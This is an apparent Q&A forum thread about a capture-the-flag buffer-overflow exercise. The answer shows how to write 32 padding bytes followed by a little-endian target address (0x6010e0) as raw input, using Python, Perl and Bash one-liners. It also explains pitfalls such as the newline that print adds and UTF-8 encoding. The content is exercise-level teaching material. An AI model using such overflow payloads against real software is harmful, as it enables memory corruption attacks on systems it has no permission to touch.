# overflow with unprintable characters

Tags: buffer-overflow, ctf

Iḿ doing this overflow exercise and the memory address I'm trying to access by overflow is 0x6010e0, the problem is, Iḿ having a hard time inputting this to the program.

I've tried

```
python -c 'print("a"*32 + "\xe0\x10\x60")' > test.txt
```

then in gdb,

```
run < test.txt
```

but no luck so far

Comment: Please clarify your specific problem or provide additional details to highlight exactly what you need. As it's currently written, it's hard to tell exactly what you're asking.

Answer (score 1):

There are a few things you should bear in mind.

1. Memory addresses are either 32 or 64 bits, but `\xe0\x10\x60` is only 24 bits. If you want to insert a complete address into the stack, you should change this to either `\xe0\x10\x60\x00` (for a 32-bit little-endian machine) or `\xe0\x10\x60\x00\x00\x00\x00\x00` (for a 64-bit little-endian machine).
2. The `print` statement in Python will output a line break (`\x0a`) after your string. You could stop this by setting the `end` parameter to an empty string (e.g., `print("blah", end="")`), but that still won't fix things because of another problem...
3. If you run `python -c 'print("\xe0", end="")' > test.txt` from the command line and then examine the contents of this file (`xxd test.txt`), you'll probably find that it contains two bytes (`\xc3\xa0`) instead of just the single byte you expected. This is because it encoded your string using UTF8 character codes. The `print()` statement in Python v3 is not the best way of outputting raw bytes. Try using `sys.stdout.buffer.write()` instead:

```bash
python -c 'import sys; sys.stdout.buffer.write(b"a"*32 + b"\xe0\x10\x60\x00")' > test.txt
```

As you can see, this is starting to get a bit cumbersome. So why not try using something else instead of Python, like Perl for example:

```bash
perl -e 'print "a" x 32 . "\xe0\x10\x60\x00"' > test.txt
```

or even Bash:

```bash
echo -ne 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xe0\x10\x60\x00' > test.txt
```